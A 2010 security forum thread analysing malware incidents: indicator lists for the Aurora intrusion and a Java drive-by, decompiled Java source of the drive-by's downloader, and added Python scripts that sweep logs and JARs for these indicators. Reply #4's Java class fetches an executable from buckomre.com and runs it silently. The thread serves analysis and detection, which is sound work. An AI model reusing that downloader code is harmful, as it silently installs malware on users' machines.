Author Topic: cyberwart blog : Undetected Malware Case Study: JAN2010-01  (Read 2492 times)

January 13, 2010, 07:08:25 pm

SysAdMini

Ruining the bad guy's day

January 19, 2010, 03:58:14 pm
Reply #1

mwollenweber

January 19, 2010, 09:13:38 pm
Reply #2

mwollenweber

The following is related to the Google intrusion set labeled Aurora by McAfee. The hosts listed by Symantec:

yahooo.8866.org
sl1.homelinux.org
360.homeunix.com
li107-40.members.linode.com
ftp2.homeunix.com
update.ourhobby.com

Details check out based on McAfee reports. Most hostnames are set to the local host, but two go to:
61.75.44.42
69.164.192.40

Writeup at:
http://www.cyberwart.com/blog/2010/01/19/idle-speculation-on-auroras/

April 16, 2010, 12:32:12 am
Reply #3

mwollenweber

http://www.cyberwart.com/blog/2010/04/14/malware-apr2010-01/

<snip>
we detected an unknown executable being downloaded from a suspicious website. After investigating the matter we determined that 95.168.185.155 (also abantont.com) was hosting the malicious file summ.exe (MD5 = c42f4a697f096c99f8c9ece028083449). The page uses obfuscated javascript to load a java control which then downloads a java jar, which then downloads and executes summ.exe. The payload calls back to 76.76.103.219 (amostagorawe.com). The site buckomre.com (217.20.121.31) is also involved with the attack.
</snip>
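
As an added example (not part of any post in this thread and not cyberwart's code), here is a small Python sweep that turns the indicators posted in the two reports above (the Aurora host list and resolutions, and the APR2010-01 hosts, IPs and MD5) into a log check. The indicator values are copied from the posts; the log lines, their squid-like format and the AV quarantine line are constructed for the demonstration and describe no real traffic. Host matching is suffix based, so a subdomain of a listed domain is also flagged.

```python
"""Sweep log lines for the indicators posted in this thread.

Added example, not code from the forum posts or from cyberwart.com.
Indicator values are the ones quoted in the posts; the sample log lines
below are constructed and do not come from any real incident.
"""
import ipaddress
import re
from typing import Dict, Iterable, List, Tuple

# Indicators quoted in the posts (JAN2010-01 / Aurora hosts, APR2010-01 hosts).
IOC_DOMAINS = {
    "yahooo.8866.org", "sl1.homelinux.org", "360.homeunix.com",
    "li107-40.members.linode.com", "ftp2.homeunix.com", "update.ourhobby.com",
    "abantont.com", "amostagorawe.com", "buckomre.com",
}
IOC_IPS = {
    "61.75.44.42", "69.164.192.40",                       # resolutions quoted in Reply #2
    "95.168.185.155", "76.76.103.219", "217.20.121.31",   # APR2010-01 (Reply #3)
}
IOC_MD5 = {"c42f4a697f096c99f8c9ece028083449"}           # summ.exe

HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)  # dotted names ending in letters
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
MD5_RE = re.compile(r"\b([0-9a-f]{32})\b", re.I)


def host_matches(host: str, domains: set) -> str:
    """Return the IOC domain that `host` equals or is a subdomain of, else ''."""
    host = host.lower().rstrip(".")
    for d in domains:
        if host == d or host.endswith("." + d):
            return d
    return ""


def sweep_line(line: str) -> List[Tuple[str, str]]:
    """Return de-duplicated (kind, indicator) hits found in one log line."""
    hits: List[Tuple[str, str]] = []

    def add(kind: str, value: str) -> None:
        if (kind, value) not in hits:
            hits.append((kind, value))

    for h in HOST_RE.findall(line):
        d = host_matches(h, IOC_DOMAINS)
        if d:
            add("domain", d)
    for ip in IP_RE.findall(line):
        try:
            ipaddress.ip_address(ip)       # drop things like 999.1.1.1 that only look like IPs
        except ValueError:
            continue
        if ip in IOC_IPS:
            add("ip", ip)
    for h in MD5_RE.findall(line):
        if h.lower() in IOC_MD5:
            add("md5", h.lower())
    return hits


def sweep(lines: Iterable[str]) -> Dict[int, List[Tuple[str, str]]]:
    """Map 1-based line number -> hits, for lines that have at least one hit."""
    result: Dict[int, List[Tuple[str, str]]] = {}
    for i, line in enumerate(lines, 1):
        hits = sweep_line(line)
        if hits:
            result[i] = hits
    return result


# Constructed sample lines (squid-like proxy log plus one AV quarantine event).
SAMPLE_LOG = [
    "1271284801.117 10.0.0.21 TCP_MISS/200 GET http://abantont.com/index.html",
    "1271284803.502 10.0.0.21 TCP_MISS/200 GET http://buckomre.com/50035/54098876",
    "1271284804.010 10.0.0.21 TCP_MISS/200 CONNECT 76.76.103.219:443",
    "1271284900.000 10.0.0.33 TCP_HIT/200 GET http://www.example.com/",
    "av-quarantine host=10.0.0.21 file=summ.exe md5=C42F4A697F096C99F8C9ECE028083449",
]

if __name__ == "__main__":
    for lineno, hits in sweep(SAMPLE_LOG).items():
        print(lineno, hits)
```

Lines 1, 2, 3 and 5 of the constructed sample are flagged (domain, domain, IP and MD5 respectively); line 4 is clean. Feed real proxy, DNS or AV export lines to `sweep()` in the same way.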

April 16, 2010, 05:28:50 am
Reply #4

SysAdMini

http://www.cyberwart.com/blog/2010/04/14/malware-apr2010-01/

<snip>
we detected an unknown executable being downloaded from a suspicious website. After investigating the matter we determined that 95.168.185.155 (also abantont.com) was hosting the malicious file summ.exe (MD5 = c42f4a697f096c99f8c9ece028083449). The page uses obfuscated javascript to load a java control which then downloads a java jar, which then downloads and executes summ.exe. The payload calls back to 76.76.103.219 (amostagorawe.com). The site buckomre.com (217.20.121.31) is also involved with the attack.
</snip>

Thank you for your report. It is an example of an exploit of the latest Java vulnerability.

http://wepawet.cs.ucsb.edu/view.php?hash=0d51ff98ee18924e1e4d20fbe4248942&t=1271378764&type=js

Source code of JAR (decompiled; the copy loop's variable declaration is moved out of the loop so the listing compiles as shown)
Code:
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;

// Stage-two downloader: fetches an executable from buckomre.com into the
// user's temp directory and launches it.
public class Main
{
  public static void main(String[] args)
    throws Exception
  {
    String exeurl = "http://buckomre.com/50035/54098876";

    // Windows only: do nothing on any other platform.
    String s = System.getProperty("os.name").toLowerCase();
    if (s.indexOf("win") < 0) {
      return;
    }

    try
    {
      URL url = new URL(exeurl);
      url.openConnection();   // return value discarded; openStream() below does the fetch
      InputStream inputstream = url.openStream();
      // Random numeric file name in %TEMP%, e.g. 2.4785639E8.exe
      String fn = System.getProperty("java.io.tmpdir") + "\\" + Math.pow(Math.random() * 1000.0D, 3.0D) + ".exe";
      FileOutputStream fileoutputstream = new FileOutputStream(fn);

      // Byte-by-byte copy of the HTTP response to disk
      int k;
      while ((k = inputstream.read()) != -1)
      {
        fileoutputstream.write(k);
      }
      inputstream.close();
      fileoutputstream.close();
      Runtime.getRuntime().exec(fn);   // run the dropped executable
    }
    catch (Exception fe)
    {
      // all errors silently swallowed
    }
  }
}
Ruining the bad guy's day
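
The decompiled class above is a plain stage-two downloader: Windows only, fetch a URL, write the bytes to a randomly named .exe under java.io.tmpdir, run it. As an added example (not part of the thread and not the malware's code), the Python below turns that source into two offline checks: a static triage of a JAR's .class entries for the combination of URL fetch, java.io.tmpdir, Runtime and an ".exe" literal, pulling out any embedded http URLs on the way, and a file-name matcher for the drop name, which Java's Double.toString renders either as 123456.789.exe (values in [1e-3, 1e7)) or as 1.23456789E8.exe. The JAR it scans is constructed in memory with a fake Main.class that holds only the constant-pool strings a javac build of the posted source would contain; that marker list is my assumption about the compiled class, not something the page states.

```python
"""Static triage for the Java downloader pattern shown in Reply #4.

Added example; not part of the original thread and not the malware's code.
The JAR scanned here is constructed in memory: its Main.class entry only
carries the constant-pool strings a javac build of the posted source would
contain (an assumption about javac output, not taken from the page).
"""
import io
import re
import zipfile
from typing import Dict, List, Optional

# Strings that land verbatim in the constant pool of a class compiled from the
# posted source. All of them in one class = the downloader signature.
DOWNLOADER_MARKERS = {
    "fetch":  b"java/net/URL",
    "stream": b"openStream",
    "tmpdir": b"java.io.tmpdir",
    "exec":   b"java/lang/Runtime",
    "exe":    b".exe",
}
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")   # stops at the next non-printable byte

# Java's Double.toString() gives "123456.789" for [1e-3, 1e7) and "1.2345E8"
# otherwise, so the dropped file is "<number>.exe" in the temp directory.
TMP_NAME_RE = re.compile(r"^\d+\.\d+(E-?\d+)?\.exe$")


def triage_jar(jar_bytes: bytes) -> Dict[str, object]:
    """Scan every .class entry of a JAR for the markers and any http(s) URLs."""
    found = set()
    urls: List[str] = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".class"):
                continue
            data = zf.read(name)
            for tag, marker in DOWNLOADER_MARKERS.items():
                if marker in data:
                    found.add(tag)
            urls.extend(m.decode("ascii", "replace") for m in URL_RE.findall(data))
    return {
        "is_downloader": found == set(DOWNLOADER_MARKERS),
        "markers": sorted(found),
        "urls": urls,
    }


def looks_like_dropped_name(filename: str) -> bool:
    """True for names the sample's Math.pow(Math.random()*1000, 3) + ".exe" scheme produces."""
    return bool(TMP_NAME_RE.match(filename))


def build_constructed_jar(strings: Optional[List[bytes]] = None) -> bytes:
    """Constructed stand-in for the real JAR: a zip whose Main.class holds the
    given constant-pool strings (default: what the posted source would carry)."""
    if strings is None:
        strings = [
            b"java/net/URL", b"openStream", b"java.io.tmpdir", b"java/lang/Runtime",
            b"exec", b".exe", b"os.name", b"win",
            b"http://buckomre.com/50035/54098876",
        ]
    fake_class = b"\xca\xfe\xba\xbe" + b"\x00".join(strings)   # magic + NUL-separated strings
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Main-Class: Main\n")
        zf.writestr("Main.class", fake_class)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_jar(build_constructed_jar()))
    for n in ("2.4785639E8.exe", "123456.789.exe", "summ.exe"):
        print(n, looks_like_dropped_name(n))
```

On a real JAR the byte search works the same way because the constant pool stores these strings as length-prefixed modified UTF-8, so class, method and literal names are visible to a plain substring scan; the URL regex stops at the tag byte of the next pool entry. The name matcher is for sweeping %TEMP% on a suspect host; a JRE that happens to drop a .exe with that numeric shape is worth a closer look regardless of this sample.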